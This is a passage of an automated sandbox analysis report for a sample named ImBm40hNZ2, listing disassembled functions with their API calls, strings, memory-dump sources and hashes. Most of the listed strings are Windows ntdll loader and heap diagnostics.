                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(0042A828,\*.*,0042A828,?,?,00435400,756A3410,00000000), ref: 004054C2
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00409014,?,0042A828,?,?,00435400,756A3410,00000000), ref: 004054E3
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00409014,?,0042A828,?,?,00435400,756A3410,00000000), ref: 004054E9
                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(0042A828,?,?,?,00409014,?,0042A828,?,?,00435400,756A3410,00000000), ref: 004054FA
                                                                                                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055A7
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004055B8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                • API String ID: 2035342205-1173974218
                                                                                                                                                                                                                                                                • Opcode ID: 6349f3dff572452614f878026353f92d633d12771a0199604bde9a196fc5ff50
                                                                                                                                                                                                                                                                • Instruction ID: aa82d0309f1ddddfbe6c40bd1d7433d9f6730d94ca5b26b608a9a455718634cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6349f3dff572452614f878026353f92d633d12771a0199604bde9a196fc5ff50
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D51D030900A04BADB216B618C45BBF7AB9DF86715F14407BF444B61D2D73C9982DEAE
                                                                                                                                                                                                                                                                Function 339A86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                                                                                                                                                • Opcode ID: d6bbdf5cd0a118caf89ac7f06d0161e5c050c3176f453638bf597e73c699fa3e
                                                                                                                                                                                                                                                                • Instruction ID: 105a1d10e57fb405618efff6ed600a9b0d6ca1036d4c6f69a373bef0e0e14481
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6bbdf5cd0a118caf89ac7f06d0161e5c050c3176f453638bf597e73c699fa3e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1519FB5508315DBD325CF5CD844A9BBBECEB84391F444A5DBAA8C3241EB70D644CB92
                                                                                                                                                                                                                                                                Function 339AF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                                                                                                • API String ID: 3446177414-1745908468
                                                                                                                                                                                                                                                                • Opcode ID: 3f65e99e6a492ea3bd3b89299fd68b5154fd598c59bb8f59e0d8cb3470eeed43
                                                                                                                                                                                                                                                                • Instruction ID: ff13de661676a97a8430fed3782a0fefe93464957b37033dad07aa799e9ce97b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f65e99e6a492ea3bd3b89299fd68b5154fd598c59bb8f59e0d8cb3470eeed43
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B913635A05744DFDB02DFACC840A9DBBF5FF49390F088659E452ABB52CB769941CB10
                                                                                                                                                                                                                                                                Function 338FD2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                                                                                                • API String ID: 0-3532704233
                                                                                                                                                                                                                                                                • Opcode ID: 5f1514e1099c083425565e327448c159cad7d349d8c6edd6cb032e9edb23fdc6
                                                                                                                                                                                                                                                                • Instruction ID: 87c72805e6b00eccc054e733eed27e75521ea0d90bec08fb49980b3be1f945e2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f1514e1099c083425565e327448c159cad7d349d8c6edd6cb032e9edb23fdc6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0B1BFB6909345DFE711CFA4D440A5FB7E8AB88788F44492EFA88D7244DB31D948CB92
                                                                                                                                                                                                                                                                Function 3392D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 3392D879
                                                                                                                                                                                                                                                                  • Part of subcall function 33904779: RtlDebugPrintTimes.NTDLL ref: 33904817
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                                                                                                                                                • Opcode ID: 05949231e766e439755250625c7f46ef0565386f3026e0ff11a782f850300a7e
                                                                                                                                                                                                                                                                • Instruction ID: c98f8d91d9fc5f2f8bc5ddc86a4bef6aaed5e0e8a05996e85a86603a53beeea4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05949231e766e439755250625c7f46ef0565386f3026e0ff11a782f850300a7e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D351DBB5E08B49CFEB14EFA8C48078DBBF9FF44354F244159C810AB296D774A982CB80
                                                                                                                                                                                                                                                                Function 338FD02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 338FD136
                                                                                                                                                                                                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 338FD0E6
                                                                                                                                                                                                                                                                • @, xrefs: 338FD09D
                                                                                                                                                                                                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 338FD202
                                                                                                                                                                                                                                                                • @, xrefs: 338FD2B3
                                                                                                                                                                                                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 338FD06F
                                                                                                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 338FD263
                                                                                                                                                                                                                                                                • @, xrefs: 338FD24F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                                                                                                • API String ID: 0-1356375266
                                                                                                                                                                                                                                                                • Opcode ID: a6a4926c5f00e91d54521fd606c06ddfed5971dcdec2fda3cbee57ceefd0708c
                                                                                                                                                                                                                                                                • Instruction ID: c086e2494f1b5c07b9b9cd66eeae305b97c2f276956597de4f127fc3a41bee73
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6a4926c5f00e91d54521fd606c06ddfed5971dcdec2fda3cbee57ceefd0708c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCA158B1908345DFE321CF64D480B9FB7E8BB84759F00492EFA9896241EB75D948CB93
                                                                                                                                                                                                                                                                Function 339AF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                                                                                                • API String ID: 0-2224505338
                                                                                                                                                                                                                                                                • Opcode ID: 1fe8fa699a644801ffc0810adc999a50f05eacc2b0c2c22d1d8161fb5a9bd69c
                                                                                                                                                                                                                                                                • Instruction ID: 1e749f350481cfa09c4ff3272e8e16ab5fcde55fdd172c72810b017118f00ed6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fe8fa699a644801ffc0810adc999a50f05eacc2b0c2c22d1d8161fb5a9bd69c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E851E236A12348EFD712DFECDC44E1A77A8EF047A4F14869AF4529B722DA76D940CA10
                                                                                                                                                                                                                                                                Function 33988633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • VerifierDebug, xrefs: 33988925
                                                                                                                                                                                                                                                                • VerifierDlls, xrefs: 3398893D
                                                                                                                                                                                                                                                                • HandleTraces, xrefs: 3398890F
                                                                                                                                                                                                                                                                • VerifierFlags, xrefs: 339888D0
                                                                                                                                                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 3398880F
                                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 339886BD
                                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 339886E7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                                                                                                                                                • Opcode ID: b7e1cb8677db40cc27cc213873310607a69e75b95a12ff707c36321bc0289a8b
                                                                                                                                                                                                                                                                • Instruction ID: bcc0d76196ccfe0de0e133ef498e6428a97533c3229411db7fdfa870e0abd4fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7e1cb8677db40cc27cc213873310607a69e75b95a12ff707c36321bc0289a8b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32914472909711EFE311DF68C880B5A77E8EB80756F450998F9A4AF652C731DC06CBA2
                                                                                                                                                                                                                                                                Function 3392237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3396A79F
                                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 33922382
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 3396A7AF
                                                                                                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 3396A7A5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                                                                                                • Opcode ID: 48bf6cd04e96db47eb63795f29ec0227e50b3eedbc2b5f2156ba7b6bb5ee0e44
                                                                                                                                                                                                                                                                • Instruction ID: 5e7cfca7549b92ce482fc135dd408c640790d9099b175be652afd102ea06fa33
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48bf6cd04e96db47eb63795f29ec0227e50b3eedbc2b5f2156ba7b6bb5ee0e44
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD31F6B6E05304EFF710AF59C880E9A77F9EB84BA4F140069E911BB251DB74A942CB50
                                                                                                                                                                                                                                                                Function 338FF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                • API String ID: 0-523794902
                                                                                                                                                                                                                                                                • Opcode ID: 1016c7ae40f2baa46ca9d4ecf36ac2d7ec230a9206a3854ea861412604452d0a
                                                                                                                                                                                                                                                                • Instruction ID: c8932ed21a1fbe90264d6d03a8bf254287dbadde91a0fb7f110c5e3b59a86e09
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1016c7ae40f2baa46ca9d4ecf36ac2d7ec230a9206a3854ea861412604452d0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6442E075608381DFE301CF68D884A6ABBE9FF88244F084A69F895CB752DB31D985CB51
                                                                                                                                                                                                                                                                Function 3391B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                                • API String ID: 0-122214566
                                                                                                                                                                                                                                                                • Opcode ID: de741045b7bcda1d832e94b1bb9fa27a5902fb261cfc7a004c6a48d5a34302f4
                                                                                                                                                                                                                                                                • Instruction ID: d9697db6e33c2679aa460e9b372d44a7e7f562868ae727ee299a236cae1d4fcb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de741045b7bcda1d832e94b1bb9fa27a5902fb261cfc7a004c6a48d5a34302f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71C17B75E0530DDBEB148B64C890B7FB7AAAF45394F5840A9D842FB291DBB4CC69C390
                                                                                                                                                                                                                                                                Function 3393631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 0-792281065
                                                                                                                                                                                                                                                                • Opcode ID: 17e58157ada76392d4e86d20fdba3ca6fd3faffcec99a3b44243671fc2855af8
                                                                                                                                                                                                                                                                • Instruction ID: 81992783329bdd6000a8b78ab001e70ecc235bd45cc9630f1086b0e7b2bd1c65
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17e58157ada76392d4e86d20fdba3ca6fd3faffcec99a3b44243671fc2855af8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D39146B1E06314DFF724EF64C884B9A7BA9EF467A1F040029E5507F6C2DB749842CB91
                                                                                                                                                                                                                                                                Function 33932594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 33971F6F
                                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 33971FC9
                                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 33971F8A
                                                                                                                                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 33971FA9
                                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 33971F82
                                                                                                                                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 33971F6A, 33971FA4, 33971FC4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                                                • API String ID: 0-861424205
                                                                                                                                                                                                                                                                • Opcode ID: a4e6cf26fd33eb94ed62fbaa2e020e93d9b87ab203b56dd8727ef703cfa8806c
                                                                                                                                                                                                                                                                • Instruction ID: 2b3814a8bcd579cdb3de6afc1bbc93d832c37f83bec102f2c2c3d21e1df94e41
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4e6cf26fd33eb94ed62fbaa2e020e93d9b87ab203b56dd8727ef703cfa8806c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 373109B6E02224FFE7209AD5DC54F5B776CEF52794F040055F9506B242D770AE01CBA5
                                                                                                                                                                                                                                                                Function 3393C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 33977F8C, 33978000
                                                                                                                                                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 33977FF0
                                                                                                                                                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 33977F7B
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 3393C5E3
                                                                                                                                                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 33977F82, 33977FF6
                                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 3393C5E4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                                • API String ID: 0-475462383
                                                                                                                                                                                                                                                                • Opcode ID: 6d62dbac7059d79752543add6fbb31e1c1362d78ca15e472db46a1aa11007686
                                                                                                                                                                                                                                                                • Instruction ID: 38f5a2cbe0c42ef871f5a0a667d4f9df6069458c4b52650f8f2c662e42cd902b
